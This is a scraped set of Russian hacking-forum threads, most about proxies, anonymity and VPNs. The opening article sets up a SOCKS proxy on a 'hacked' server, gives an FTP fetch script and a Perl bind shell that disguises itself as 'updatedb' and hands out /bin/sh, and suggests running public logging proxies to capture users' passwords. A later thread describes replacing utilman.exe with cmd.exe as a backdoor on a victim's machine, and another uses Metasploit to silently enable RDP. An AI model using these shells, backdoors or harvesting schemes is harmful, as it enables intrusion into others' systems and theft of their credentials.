Ты юзаешь прокси? Уверен что да. А ты никогда не задумывался откуда они берутся и для чего их создают а? Подумай сам, ведь прокси генерируют огромный траффик. Кому нада за него платить? А вот кому. Большинство публичных прокси серверов устанавливаются либо хакерами, либо спецслужбами для поимки первых. А поймать хакера, заюзавшего КГБ’шный проксик очень просто. Допустим хакер взломал сервер банка, выкачал интересующую его инфу, после чего админ заподозрил взлом, админ покопался в логах нашел айпишник хакера (точнее айпишник проксика через который работал хакер) и побежал премиком на Лубянку (предположим %). Сотрудники отдела “К” проверили по своей базе этот самый IP и увидили что это айпишник ихнего проксика. Теперь дело за малым, сотрудники ковыряют логии на сервере где установлен их проксик. ВСЁ, ХАКЕР ПОД КОЛПАКОМ!
Мы рассмотрели первый вариант, теперь немного расскажу о втором.
Представь такую ситуацию. Я борзый падопак-хакер поставивший свой проксик, и конечно я не забыл включить у своего проксика функцию ведения логов. После чего я щедро оставляю свой проксик в паблике и наивные юзере пользуются ими. Наверное у тебя возник вопрос: а нафига мне ему это нада, чё он будет делать с этими логами? Да всё просто, весь трафик проходящий через мой проксик будет записываться в лог-файл. Ты залогинился под своим паролем в аське, твой пароль записался в лог моего проксика %).
Стрёмно получается да? Так вот чтоб с тобой не произошло ничего из вышеизложенного я и написал эту стаью (признаюсь тема заеженна по потери пульса). Выход один- ставить собственный проксик.
Я расскажу об установке наиболее популярного (популярного по праву) socks прокси сервера под названием 3proxy от ЗАРАЗЫ. Рульность этого проксика заключается в том, что его можно установить даже с nobody правами!
Итак начнём:
**
Нам понадобятся:
1. Руки прямые - 2 шт.
2. архвив 3proxy
3. Шелл.
**
Что такое шелл и как с ним работать я тоже не буду объяснять, не об этом моя статья. 3proxy можно скачать с офсайта www.security.nnov.ru/soft/3proxy . Шелл выбирать тебе, либо это будет похаканный тобой серв, либо шелл на платном хостинге. Почему на платном? Да потому что ни один бесплатный хостер не позволит тебе установить проксик, проверял сам лично (хотя если найдшь такое чудо, незабудь поделиться со мной ) Надеюсь о том как забидить шелл на уязвимой тачке рассказывать не нужно (но всё таки если у тебя с этим проблемы, пиши, накатаю продолжение %).
Итак, ты на шелле. Качай архивчик с 3proxy и приступим к процессу установки (для танкистов поясняю, скачать можно любым даунлоадером установленным на серве, если же даунлоадера ты не нашел, заливай через FTP).
Как я уже говорил закачку файла можно произвести командой wgethttp://site.ru/file.tar.gz . Но иногда можно столкнуться с отсутствием утилиты wget на сервере. Но это не проблема, т.к. помимо wget существуют другие консольные даунлоадеры, например curl и fetch. Работют с ними по тому же принципу что и с wget, например ты нашел на серве curl , командуй: curlhttp://site.ru/file.tar.gz .
А что делать если на серванте вообще нет даунлоадера !? К сожалению бывает и такое. Но вы ход есть всегда . Ведь если у тебя есть шелл, ты можешь залить файлы на него через FTP. Вот как это реализовать:
Вообще если ты занимаешься сетевым взломом, то у тебя наверняка есть свой склад сплойтов и прочего жобра на каком либо хостинге. Если же ты до сих пор не зарегистрировал аккаунт на бесплатном хостинге, беги регистрировать, например на www.newmail.ru, имхо на этом хостинге нет антивирей и для хранения эксплойто и другой лабуды он подходит лучше всего.
Итак ты зарегистрировал свой аккаунт на newmail.ru, тебе дали ящик и место под сайт в придачю. Заливай на свой свежезареганный сайт 3proxy. Теперь собственно приведу пример того, как закачать на шелл нужный нам сайт через FTP (всё что после # это мои пояснения, их писать не нужно %):

echo open ftp.newmail.ru 21 >mpg # соеденяемся с FTP-сервом
echo yoursite.nm.ru >>mpg # здесь адрес твоего сайта
echo password >>mpg # пароль к твоему аккаунту
echo bin >>mpg # заходим на сайт (чёта такое, точно незнаю %)
echo get 3proxy.tar.gz >>mpg # сливаем с сайта архивчик с 3proxy
echo bye >>mpg # закрываем соединение
ftp -s:mpg

Click to expand...

Итак скачаллось, теперь разархивируй архив. В папке с разархивированным проксиком скомандуй make –f Makefile.unix и жди пока процесс компиляции модулей завершится. Если ты всё сделаешь правильно (и если нормальный шелл), то появится один бинарник с названием 3proxy. Всё. Ты собрал свой проксик, теперь его нужно отконфигурировать. Создаём в той же папке где и бинарник 3proxy файл 3proxy.cfg .
Создал? Молодец, теперь вбиваем настройки, их немного.
Пиши в файле конфига следующее (всё что после # в конфиг добавлять ненужно, ето мои коментарии %) :

nserver 127.0.0.1 # адрес DNS для автоматического соединения
auth none # отключаем авторизацию =))
**allow *** # рашзрешение на использование проксика с любого адреса.
socks –p7855 # номер порта нашего сокса.
internal 127.0.0.1 # внутренний IP
log /dev/null # сюда будут записываться логи. Не волнуйся сюда можно только записывать инфу, прочесть её невозможно .

Click to expand...

Если ты всё набрал, нажми ctrl+c , конфиг запишется в ту директория в которой ты его создавал.
Вот впринципе и всё по установке. Чтобы запустить собранный сокс скомандуй ./3proxy 3proxy.cfg .

Рассмотрим пример конфига, в котором мы установим авторизацию на нашем соксе:

nserver 127.0.0.1 # адрес DNS для автоматического
users nick:CL:pass # создаём юзера с ником nick и паролем pass 8)
auth strong # указываем необходимость авторизации !
**allow *** # рашзрешение на использование проксика с любого адреса.
socks –p7855 # номер порта нашего сокса.
internal 127.0.0.1 # внутренний IP
log /dev/null # сюда будут записываться логи. Не волнуйся сюда можно только записывать инфу, прочесть её невозможно

Click to expand...

В конфиге воявляется новая строчка users nick:CL:pass , этой строкой ты создаёшь юзера (nick и pass конечно нужно поменять на свои %). Юзеров можно создать несколько, делается это одинаково. И незабудь изменить строчку auth none на auth strong !

Необходимо забиндить (тоесть открыть) порт для 3proxy.

Скрипт:

#!/usr/bin/perl
$port = 32767;
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1){
accept(X, S);
unless(fork)
{ open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
} close X;}

Click to expand...

Сохраняем код с файл с расширение .pl , например bind.pl
Заливаем его на шелл.
Выполняем на шелле команду perl bind.pl
После проделанных действий на шелле откроется 32767 порт.
Нам прийдётся подкорректировать в конфиге 3proxy порт, в строчке socks –p7855 меняем с 7855 на 32767.

З.Ы. А ведь ты можешь помимо собственного использования заюзать socks в своих мерзких делишках . Подумай сам, что тебе мешает создать отдельный проксик (как всё умные мерзавци-хакеры и щедро раздавать его направо и налевло, незабыв при этом указать для логов не дерикторию /dev/null , а в более подходящее для твоих гадких делишек место .

Удачи...

Улучшение приватности DNS в Firefox

ID: 676533bbb4103b69df371d9d
Thread ID: 26161
Created: 2018-10-03T11:12:40+0000
Last Post: 2018-10-03T11:12:40+0000
Author: tabac
Replies: 0 Views: 1K

Улучшение приватности DNS в Firefox

Долгое время группы безопасности и сетевые разработчики в Firefox работают над проблемой приватности DNS. Тестируют сервисы шифрования DNS запросов, чтобы держать подальше нерадивых провайдеров собирающих DNS трафик для составления истории посещений.

Более 30 лет DNS служит ключевым механизмом современной сети. Рожденный во времена маленького и менее воинственного интернета, протокол не предполагает никаких средств защиты от прослушивания.

Новая попытка команды Firefox изменить ситуацию заключается в внедрении DoH(DNS over HTTPS). Протокол который шифрует запросы и ответы был добавлен в Firefox версии 62. Реализации серверов DNS по HTTPS уже доступны бесплатно некоторыми публичными поставщиками DNS (CloudFlare, Google, CleanBrowsing)

Но Firefox пока не использует этот протокол по-умолчанию.

Для того чтобы включить эту опцию, нужно:

Ввести about:config в адресной строке

Найти network.trr (TRR это Trusted Recursive Resolver – DoH Endpoint used by Firefox.)

Изменить network.trr.mode на 2 .

Изменить network.trr.uri на адрес DoH сервера.

Данные манипуляции включат DoH, за исключением некоторых ситуаций (например captive portals)

P.S. Если вы пользуйтесь Nightly сборкой Firefox и у вас включен SHIELD Studies, то ваш браузер уже использует DoH от CloudFlare. Удачных экспериментов!

© DmitryU

Создаем цепочку из нескольких SSH

ID: 676533bbb4103b69df371d9e
Thread ID: 26160
Created: 2018-10-03T11:11:14+0000
Last Post: 2018-10-03T11:11:14+0000
Author: tabac
Replies: 0 Views: 1K

Создаем цепочку из нескольких SSH

(!) Заметка для новичков

Допустим, у нас есть три ssh (Россия, Австралия, Швейцария) – пожалуй одна из лучших связок, так как мы хотим сделать цепочку из этих ssh, да так, чтоб каждый из узлов, не знал реальный ip, который инициирует трафик (кроме входящего), и каждая из сессий шифровалась уникальным ключом, то есть "внутренние" узлы не смогут снифить траффик, кроме последнего, он будет служить отправной точкой. По такому принципу работает сеть TOR, отличие только в том, что узлы в цепочке меняться не будут.

Для реализации цепи, нам потребуется ssh - клиент www.putty.org

Шаг 1

Запускаем Putty

Code:Copy to clipboard

Connection->SSH->Tunnels

В Source Port пишем любой свободный порт, например 9048
Обозначьте чекбоксы Dynamic и IPv4

В Session, пишете IP хоста и в поле "Saved Sessions" вписать название страны ssh и нажать Save, чтоб в дальнейшем не делать лишних движений.
Жмете Open и коннектимся. Putty сворачиваем, не закрываем.

Поздравляю, мы подняли socks5 сервер на локальном хосте (127.0.0.1:9048)

Шаг 2

Идем дальше. Запускам Putty

Code:Copy to clipboard

Connection-> SSH->Tunnels

В Source Port пишете любой свободный порт, например 9049
Обозначаете чекбоксы Dynamic и IPv4

В Connection->Proxy, и вводите Proxy type: SOCKS 5, Proxy hostname: 127.0.0.1, Port: 9048, Do DNS name lookup at proxy end: Yes.

В Session, пишете IP хоста, в поле Saved Sessions вписать название страны ssh и нажать Save. Жмете Open и коннектимся. Putty сворачиваем.

Что мы только что сделали?

Первое, подключились к нашему локальному socks (127.0.0.1:9048) и как результат, весь трафик идет через первый узел. Второе, подняли socks5 сервер на локальном хосте (127.0.0.1:9049), для последующих подключений.

В итоге, повторяя шаг два и, меняя в шестом пункте номер порта (в нашем случае, для третьего узла будет порт 9049), можно поднимать сколько угодно соксов и пробрасывать через них трафик. На последнем узле так же поднимаем socks сервер и указываем его в качестве "socks proxy" в proxyfier.

В результате, ты будешь находиться в стране последнего узла. Все просто, таким образом можно обогнуть всю планету.

Я неспроста взял первый порт 9048, потому что поднимая цепочку из трех ssh, последний socks будет поднят на порте 9050, а этот порт по стандарту слушает ProxyChains, то есть ProxyChains из коробки слушает порт ТОРА, так удобнее, не нужно лезть в конфиги и ты точно знаешь на каком порту, какая страна.

Обязательно смените DNS в настройках адаптера.

Одной командой с помощью proxychains:

Code:Copy to clipboard

sudo proxychains ssh –D 127.0.0.1:8181 username@142.98.11.21

Без поддержки терминала

Code:Copy to clipboard

sudo ssh -D 127.0.0.1:1080 -N test@62.xxx.100.xxx

Просто прокинуть порт

Code:Copy to clipboard

sudo ssh -t user@srv1 -L 56443:localhost:56443 ssh user@srv2 -L 56443:localhost:56443 -t ssh user@srv3 -L 56443:localhost:443

© madik

Анонимный роутер на Raspberry PI (TOR+SOCKS)

ID: 676533bbb4103b69df371d9f
Thread ID: 26155
Created: 2018-10-03T10:04:25+0000
Last Post: 2018-10-03T10:04:25+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 1K

Анонимный роутер на Raspberry PI (TOR+SOCKS)

В далекой далекой галактике… хотя нет не из этой оперы данная статья,
Изначально я хотел написать статью как это все поднимать, расписывать каждый конфиг, но я понял что это убьет уж очень много времени.
Проще будет вам показать что получилось, продемонстрировать инсталяционный скрипт и конфиги.

И так перейдем к описанию.
Платформой нашего роутера выбран Raspberri PI 3
На текущий момент всё собрано на последней версии raspbian

OS : Debian Strech 9
RASPBIAN STRETCH LITE
Version:November 2017
Release date:2017-11-29
Kernel version:4.9

Оригинальная ОС доступна для загрузки вот тут https://www.raspberrypi.org/downloads/raspbian/

Роутер умеет подбирать интернет через Ethernet или USB 3G модем воткнутый в него.
Дальше у роутера есть 3 режима работы.

Code:Copy to clipboard

TOR - (Работает только через тор) TOR + SOCKS (ТОР а сверху тора на выходе используется обычный socks5) TOR + SOCKS = AUNTH (ТОР а сверху тора на выходе используется обычный socks5 с авторизацией) Все это добро раздается по WIFI.

Вы подключаетесь по WIFI к нашему роутеру

Code:Copy to clipboard

SSID : AP-1 Password : 12345678

и без всяких дополнительных настроек получаете интернет через ТОР или ТОР + Сокс, проксифаер и другие вещи не нужны, все делается на роутере.
Все DNS запросы идут через ТОР с помощью демона dns_tcp_proxy.

Что на самом роутере?

Code:Copy to clipboard

3proxy - в качестве сокс демонна в режиме транспарент + parrent dns_proxy - для туннелирования dns запросов в тор. hostapd - для раздачи wifi dnsmasq - для раздачи IP адресов wifi клиентам. python3 - для работы написанного мной webmanager интерфейса. тор - сами знаете для чего. wvdial - для работы с 3G модемом.

Я не очень программист, у меня ушло 2 дня на создание интерфейса роутера на Python и получилось в результате вот это.
Скриншоты интерфейса :

2.

3.

4.

5.

Полный образ Raspberri PI3 со всем установленным и полностью рабочим вариантом можете скачать тут.

Code:Copy to clipboard

https://nova.ws/dl/release/pi_tor_socks/pi_tor_socks.img

Или с зеркала

Code:Copy to clipboard

https://mega.nz/#!itMHhIIb!eyg19NQemWFtCvX8HZsWOi-ra-KphiUN4qHYmPggUk0

Образ полностью готов к работе, записываем на SD карту с помощью etcher, и вставляем в малинку.
Образ слегка модифицирован, удалена запись pi вход только под root, SSH уже включен.
Данные для подключения по SSH

Code:Copy to clipboard

Username : root Pass : 123456

Все остальное по дефолту, как и в классическом распбиан.
При первом запуске нужно будет расширить файловую систему.
для этого набираем

Code:Copy to clipboard

raspi-config

И идем вот в эти менюшки

затем в

И соглашаемся на увеличение пространства.

Вариант для тех кто хочет все собрать сам, на своей малиннке с чистым debian stretch.

Скрипт инсталятор :

Code:Copy to clipboard

https://nova.ws/dl/release/pi_tor_socks/install.sh

Небольшое описание процесса.

Скачиваем debian stretch
записываем на SD карту, я рекомендую для записи ethcer взять можно тут : https://etcher.io/
после того как запись завершена не забываем включить ссш.
для этого снова подключаем SD карту в ноут и создаем на бутовой партиции файлик ssh без расширения txt итд.
безопасно извлекаем карту и вставляем в малинку.
когда загрузится малинка логинимся на нее с помощью SSH

Code:Copy to clipboard

Username : pi Password : raspberry

Затем набираем sudo -s (переходим в режим root)
И скачиваем мой инсталятор

Code:Copy to clipboard

curl -O https://nova.ws/dl/release/pi_tor_socks/install.sh

Когда процесс загрузки будет завершен, набираем

Code:Copy to clipboard

sh install.sh

Дальше мой скрипт сделает все сам.
В процессе установки могут возникнуть дополнительные вопросы, вот ответы на них.

Админка роутера доступна по адресу : http//192.168.22.1:5000 (если вы к ней подключаетесь по wifi)

На текущий момент все протестировано, перезаписано не один раз, и работает вроде как корректно, как мог так и протестировал….

P>S
Возможно будет работать и на других устройствах, Orange PI, BananaPI итд.. тут я не знаю.
Если можете установить дистрибутив и проверить будет замечательно.
В теории если на ваше устройство можно поставить дистрибутив raspbian lite указанный выше по ссылке, то все должно работать.

Готовые конфиги можно качнуть вот тут :

Code:Copy to clipboard

https://nova.ws/dl/release/pi_tor_socks/pi_tor_socks_conf.tar.gz

Вебморду на питоне отдельно можно качнуть тут

Code:Copy to clipboard

https://nova.ws/dl/release/pi_tor_socks/pi_tor_socks_web.tar.gz

P>P>S
3G демон запущен по дефолту, у меня MF180 И MF667 заводятся нормально.
Что бы не менять порт в конфиге 3G в интерфейсе малинки.
Втыкаем вот в этот порт.

Вроде как все.. конец

© Nova 2017

троянская закладка в компе

ID: 676533bbb4103b69df371da0
Thread ID: 26152
Created: 2018-10-03T01:15:16+0000
Last Post: 2018-10-03T09:24:04+0000
Author: xrahitel
Replies: 1 Views: 1K

Всем привет данный способ работает в любом windows и RDP если у Вас доступ к тачке жертвы через вторую сессию и.т.д также можно в том числе и через консоль восстановления. Так или иначе, ты можешь сделать копию файла utilman.exe, а затем заменить его на cmd.exe. Сначала сделаем копию исходного файла.

copy %windir%\system32\utilman.exe %windir%\system32\utilman-new.exe

Click to expand...

Затем перезаписываем исходный файл utilman.exe файлом cmd.exe:

copy %windir%\system32\cmd.exe %windir%\system32\utilman.exe

Click to expand...

Буква диска (системного раздела) в переменной %windir% не обязательно будет C:\. Ее можно узнать при помощи утилиты diskpart — командой list volume.

После замены utilman.exe файлом cmd.exe при следующей загрузке Windows ты увидишь привычный экран приветствия. Только при клике на «Специальные возможности» теперь будет открываться командная строка.

В ней можно делать все то же, что и обычно. Например, можешь выяснить актуальный список учетных записей командой net user и поменять их параметры. Делаешь с любым аккаунтом что угодно — активируешь и деактивируешь, меняешь пароли, изменяешь сроки их действия и так далее. Данный способ выше с xakepa но у меня он не с работал делайте как видео и х.. когда проебёте RDP server домашку видео в бою тыц

p.s да обычно вход скрыт то это тыц вкатывает :lol2:

rdpwrap скрытая rdp

ID: 676533bbb4103b69df371da1
Thread ID: 26151
Created: 2018-10-03T00:59:07+0000
Last Post: 2018-10-03T00:59:07+0000
Author: xrahitel
Replies: 0 Views: 1K

rdpwrap 1.6.1 silent coded by MrHudson185 me
requires .net tested on Windows 7 and Windows 10
requires Admin privileges
Attention you will still need the username and password

You can use Metasploit's Meterperter bot's post exploitation module to add a user and password since you probably aready have admin on the box
post/windows/manage/enable_rdp
Description:
This module enables the Remote Desktop Service (RDP). It provides
the options to create an account and configure it to be a member of
the Local Administrators and Remote Desktop Users group. It can also
forward the target's port 3389/tcp.You can use Metasploit's Meterpeter bot portfwd to bypass nat as shown in the video тыц и скачать тыц :unsure:

США:соглашение об экстрадиции с более 100 странами

ID: 676533bbb4103b69df371da4
Thread ID: 25473
Created: 2014-11-05T16:16:12+0000
Last Post: 2014-11-06T10:37:48+0000
Author: FirstVPN
Replies: 2 Views: 1K

Соединенные Штаты Америки имеют соглашения об экстрадиции с более 100 странами, в число которых входят страны Евросоюза.
С 1 февраля 2010 года действует специальное соглашение об экстрадиции с Европейским Союзом. С 1996 года существует также договор об экстрадиции с Гонконгом, который является специальным административным районом КНР (с самой КНР такого соглашения у США нет). Существовавший с 1902 года договор между США и Югославией признается в отношении Хорватии и Боснии и Герцеговины.

Соединенные Штаты Америки имеют договоры об экстрадиции со странами:

Австралия, Австрия, Албания, Антигуа и Барбуда, Аргентина,
Багамские острова, Барбадос, Белиз, Бельгия, Болгария, Боливия, Бразилия,
Великобритания, Венгрия, Венесуэла,
Гаити, Гайана, Гамбия, Гана, Гватемала, Германия, Гондурас, Гренада, Греция,
Дания, Доминика, Доминиканская Республика,
Египет,
Замбия, Зимбабве,
Израиль, Индия, Иордания, Ирак, Ирландия, Исландия, Испания, Италия,
Канада, Кения, Кипр, Кирибати, Колумбия, Конго, Коста-Рика, Куба,
Латвия, Лесото, Либерия, Литва, Лихтенштейн, Люксембург,
Маврикий, Малави, Малайзия, Мальта, Маршалловы острова, Мексика, Микронезия, Монако, Мьянма,
Науру, Нигерия, Нидерланды, Никарагуа, Новая Зеландия, Норвегия,
Пакистан, Палау, Панама, Папуа - Новая Гвинея, Парагвай, Перу, Польша, Португалия,
Румыния,
Сальвадор, Сан-Марино, Свазиленд, Сейшельские острова, Сент-Винсент и Гренадины, Сент-Кристофер и Невис, Сент-Люсия, Сингапур, Словакия, Словения, Соломоновы острова, Суринам, Сьерра-Леоне,
Таиланд, Танзания, Тонга, Тринидад и Тобаго, Тувалу, Турция,
Уругвай,
Фиджи, Филиппины, Финляндия, Франция,
Чехия, Чили,
Швейцария, Швеция, Шри-Ланка,
Эквадор, Эстония,
ЮАР, Южная Корея,
Ямайка, Япония.

Vpn: Pptp Vs L2Tp Vs Openvpn Vs Sstp

ID: 676533bbb4103b69df371da5
Thread ID: 25445
Created: 2014-10-20T10:23:05+0000
Last Post: 2014-10-20T10:23:05+0000
Author: FirstVPN
Replies: 0 Views: 1K

VPN-провайдеры обычно предлагают на выбор несколько типов подключения, иногда как часть различных тарифных планов, а иногда в составе единого тарифного плана. Цель этой статьи – провести обзор доступных вариантов VPN и помочь понять основы используемых технологий.

Заметка про длину ключа шифрования

Грубо говоря, длина ключа, используемого при создании шифра, определяет, сколько времени потребуется для взлома с помощью прямого перебора. Шифры с более длинными ключами требуют значительно больше времени для перебора, чем более короткие («брутфорс» означает перебор всех возможных комбинаций, пока не будет найдена верная).
Сейчас почти невозможно найти VPN-шифрование с использованием ключа длиной менее 128 бит и все сложнее найти 256-битное шифрование в предлагаемых OpenVPN-решениях, ключи которых бывают даже 2048 бит. Но что означают эти цифры на практике, 256-битное шифрование действительно более безопасное, чем 128-битное?
Краткий ответ таков: при практическом применении – нет. Это правда, что взлом 256-битного ключа потребует в 2128 больше вычислительной мощности, чем взлом 128-битного ключа. Это означает, что потребуется 3.4х10^38 операций (количество комбинаций в 128-битном ключе) – подвиг для существующих компьютеров и даже в ближайшем будущем. Если бы мы применили самый быстрый суперкомпьютер (по данным 2011 года его скорость вычислений 10.51 петафлопс), нам потребовалось бы 1.02х10^18 (около 1 миллиарда) лет, чтобы взломать 128-битный AES-ключ путем перебора.
Так как на практике 128-битный шифр не может быть взломан путем перебора, было бы правильно говорить, что ключа такой длины более чем достаточно для большинства применений. Только настоящие параноики (например, чиновники в правительстве, имеющие дело со сверхсекретными документами, которые должны оставаться в тайне в течение следующих 100 или более лет) могут использовать 256-битное шифрование (правительство США, например, использует сертифицированный NIST 256-битный AES-шифр).
Так почему же все более часто встречаются VPN-провайдеры, предлагающие 256-битное шифрование (не говоря уже о 2048-битном)? Особенно если учесть, что использование шифрования с 256-битным или более длинным ключом требует больше вычислительных ресурсов. Ответ прост – маркетинг. Проще продать VPN-услуги с более длинным ключом шифрования.
Крупные корпорации и правительства могут испытывать потребность в дополнительной безопасности, обеспечиваемой длинными ключами, но для среднего домашнего пользователя VPN с ключом 128 бит более чем достаточно.
Различные шифры имеют уязвимости, которые могут быть использованы для быстрого взлома. Также могут быть использованы специальные программы, такие как клавиатурные шпионы. Подводя итоги, можно сказать, что использование шифрования с ключом более 128 бит на самом деле вряд ли имеет значение для большинства пользователей.

PPTP
Протокол туннелирования точка-точка (Point-to-Point Tunneling Protocol) – это протокол, изобретенный Microsoft для организации VPN через сети коммутируемого доступа. PPTP является стандартным протоколом для построения VPN уже на протяжении многих лет. Это только VPN-протокол и он опирается на различные методы аутентификации для обеспечения безопасности (наиболее часто используется MS-CHAP v.2). Доступен как стандартный протокол почти во всех операционных системах и устройствах, поддерживающих VPN, что позволяет использовать его без необходимости установки дополнительного программного обеспечения. PPTP остается популярным выбором как предприятий, так и VPN- провайдеров. Его преимущество также в том, что он использует меньше вычислительных ресурсов, следовательно обладает высокой скоростью работы.
Хотя PPTP обычно и используется со 128-битным шифрованием, в следующие несколько лет после включения этого протокола в состав Windows 95 OSR2 в 1999 году были найдены ряд уязвимостей. Наиболее серьезной из которых явилась уязвимость протокола аутентификации MS-CHAP v.2. Используя эту уязвимость, PPTP был взломан в течение 2 дней. И хотя компанией Microsoft была исправлена эта ошибка (за счет использования протокола аутентификации PEAP, а не MS-CHAP v.2), она сама рекомендовала к использованию в качестве VPN проколов L2TP или SSTP.

Плюсы:
- клиент PPTP встроен почти во все операционные системы
- очень прост в настройке
- работает быстро
Минусы:
- небезопасен (уязвимый протокол аутентификации MS-CHAP v.2 все еще много где используется)

L2TP и L2TP/IPsec
Протокол туннелирования 2 уровня (Layer 2 Tunnel Protocol) – это протокол VPN, который сам по себе не обеспечивает шифрование и конфиденциальность трафика, проходящего через него. По этой причине, как правило, используется протокол шифрования IPsec для обеспечения безопасности и конфиденциальности.
L2TP/IPsec встроен во все современные операционные системы и VPN-совместимые устройства, и так же легко может быть настроен как и PPTP (обычно используется тот же клиент). Проблемы могут возникнуть в том, что L2TP использует UDP-порт 500, который может быть заблокирован файрволлом, если вы находитесь за NAT. Поэтому может потребоваться дополнительная настройка роутера (переадресация портов). Кстати, протокол SSL, например, использует TCP-порт 443, чтобы быть неотличимым от обычного HTTPS-трафика.
Протокол IPsec на данный момент не имеет никаких серьезных уязвимостей и считается очень безопасным при использовании таких алгоритмов шифрования, как AES. Однако, поскольку он инкапсулирует данные дважды, это не так эффективно, как SSL-решения (например, OpenVPN или SSTP), и поэтому работает немного медленнее.

Плюсы:
- очень безопасен
- легко настраивается
- доступен в современных операционных системах
Минусы:
- работает медленнее, чем OpenVPN
- может потребоваться дополнительная настройка роутера

OpenVPN
OpenVPN является достаточно новой технологией с открытым кодом, которая использует библиотеку OpenSSL и протоколы SSLv3/TLSv1, наряду с множеством других технологий для обеспечения надежного VPN-решения. Одним из его главных преимуществ является то, что OpenVPN очень гибок в настройках. Этот протокол может быть настроен на работу на любом порту, в том числе на 443 TCP-порту, что позволяет маскировать трафик внутри OpenVPN под обычный HTTPS (который использует, например, Gmail) и поэтому его трудно заблокировать.
Еще одним преимуществом OpenVPN является то, что используемые для шифрования библиотеки OpenSSL поддерживают множество криптографических алгоритмов (например, AES, Blowfish, 3DES, CAST-128, Camelia и другие). Наиболее распространенные алгоритмы, которые используют VPN-провайдеры – AES и Blowfish. AES является новой технологией, и хотя оба считаются безопасными, тот факт, что он имеет 128-битный размер блока, а не 64-битный как у Blowfish, означает, что он может работать с большими (более 1Гб) файлами лучше. Различия, однако, довольно незначительные. То, как быстро работает OpenVPN, зависит от выбранного алгоритма шифрования, но, как правило, работает быстрее, чем IPsec.
OpenVPN стал технологией №1 при использовании VPN, и хотя он изначально не поддерживается операционными системами, этот протокол широко поддерживается через стороннее программное обеспечение. Совсем недавно невозможно было использовать OpenVPN на iOS и Android без джейлбрейка и рута, а сейчас появились сторонние приложения, которые частично решили эту проблему.
С этим связана другая проблема OpenVPN – гибкость может сделать его неудобным в настройке. В частности, при использовании типовой программной реализации OpenVPN (например, стандартный открытый клиент OpenVPN под Windows) необходимо не только скачать и установить клиент, но и загрузить и установить дополнительные конфигурационные файлы. Многие VPN-провайдеры решают эту проблему путем использования преднастроенных VPN-клиентов.

Плюсы:
- гибко настраивается
- очень безопасен (зависит от выбранного алгоритма шифрования, но все они безопасны)
- может работать сквозь файрволлы
- может использовать широкий спектр алгоритмов шифрования
Минусы:
- необходимо стороннее программное обеспечение
- может быть неудобен в настройке
- ограниченная поддержка портативными устройствами

SSTP
Протокол безопасного туннелирования сокетов (Secure Socket Tunneling Protocol) – был представлен Microsoft в Windows Vista SP1, и хотя он теперь доступен на Linux, RouterOS и SEIL, он по-прежнему используется в значительной степени только Windows-системами (есть очень маленький шанс, что он появится на Apple устройствах). SSTP использует SSL v.3 и, следовательно, предлагает аналогичные преимущества, что и OpenVPN (например, возможность использовать TCP-порт 443 для обхода NAT), а так как он интегрирован в Windows, он проще в использовании и более стабилен, чем OpenVPN.

Плюсы:
- очень безопасен (зависит от алгоритма шифрования, обычно используется очень стойкий AES)
- полностью интегрирован в Windows (начиная с Windows Vista SP1)
- имеет поддержку Microsoft
- может работать сквозь файрволлы
Минусы:
- работает только в Windows-среде

Заключение

PPTP небезопасен (даже его создатели в Microsoft отказались от него), поэтому его использования следует избегать. В то время, как простота установки и кроссплатформенная совместимость являются привлекательными, L2TP/IPsec имеет те же преимущества и является более безопасным.

L2TP/IPsec является хорошим решением VPN, но не таким хорошим, как OpenVPN. Однако, для быстрой настройки VPN без необходимости установки дополнительного программного обеспечения остается лучшим решением, особенно для мобильных устройств, где поддержка OpenVPN по-прежнему на низком уровне.

OpenVPN является лучшим решением VPN несмотря на необходимость стороннего программного обеспечения во всех операционных системах. Это надежный, быстрый и безопасный протокол, хотя и требует немного больше усилий, чем другие протоколы.

SSTP предлагает большинство преимуществ OpenVPN, но только в среде Windows. Это означает, что он лучше интегрирован в ОС, но благодаря этому он слабо поддерживается VPN-провайдерами.
Большинство пользователей могут использовать OpenVPN на своих настольных компьютерах, возможно, дополнив его L2TP/IPsec на своих мобильных устройствах.

Нахождение человека при помощи соц инженерии

ID: 676533bbb4103b69df371da7
Thread ID: 25113
Created: 2014-04-02T04:07:19+0000
Last Post: 2014-04-02T09:39:35+0000
Author: farooooox
Replies: 1 Views: 1K

На примере известного пранкера Евгения Вольнова:
http://evgeniy-volnov.biz/deanon

me пошел чистить за собой хвосты.

поиск почтовика анонимного

ID: 676533bbb4103b69df371da8
Thread ID: 24904
Created: 2014-01-06T18:21:46+0000
Last Post: 2014-01-06T18:49:11+0000
Author: Ar3s
Replies: 1 Views: 1K

Требования:
1. отправка писем через smtp без обязательного TLS или SSL (средствами php)
2. анонимность отправляющего. т.е. в письме не видно ни почтового агента ни ip отправителя. Строго обратный адрес, название сайта и т.д.
3. желательно с регой и постоянным адресом отправителя. В худшем случае - рандом отправителя.
4. инбокс более-менее ровный. Рассылок не будет. Чисто точечная отправка.

i2p

ID: 676533bbb4103b69df371da9
Thread ID: 24870
Created: 2013-12-17T18:17:28+0000
Last Post: 2013-12-19T16:04:58+0000
Author: Ar3s
Replies: 2 Views: 1K

[mod][Ar3s:] Внимание. Это перепост![/mod]

Данная статья предназначена для тех, кто хотел бы разработать собственного I2P клиента «с нуля». Предполагается знакомство с основными концепциям и понятиями I2P. На настоящий момент на это счет имеется достаточно документации и статей, в том числе и переведённых на русский язык. С другой стороны имеется официальная документация, достаточно хорошо описывающая протоколы и форматы сообщений. К сожалению она носит разрозненный характер, при этом многие неочевидные вещи там отсуствуют. Данная статья написана в первую очередь на основе изучения и отладки официального I2P джава-клиента. Конечной целью является реализация полностью на C++. Исходный код проекта в текущем состоянии располагается на гитхабе.

Используемое шифрование

Для построения собственного I2P маршутизатора необходимо наличие реализации следующих алгоритмов шифрования:
Эль-Гамаль (ElGamal). Ассиметричное шифрование, основанное на возведении основания в степень по модулю. Основание и модуля являются фиксированными константами для всей сети I2P. Помимо блоков стандартного размера в 514 байта, также используются блоки нестандартного размера в 512 байт.
Диффи-Хельман (Diffie-Hellman) для получения общего ключа симметричного ключа шифрования путем обмена публичными ключами. Используются те же самые ключи что и для Эль-Гамаля.
DSA для создания и проверки электронной подписи
AES а двух режимах: CBC с использованием ключа шифрования и вектора инициализации (IV), ECB для шифрования собственно IV длиной 16 байт
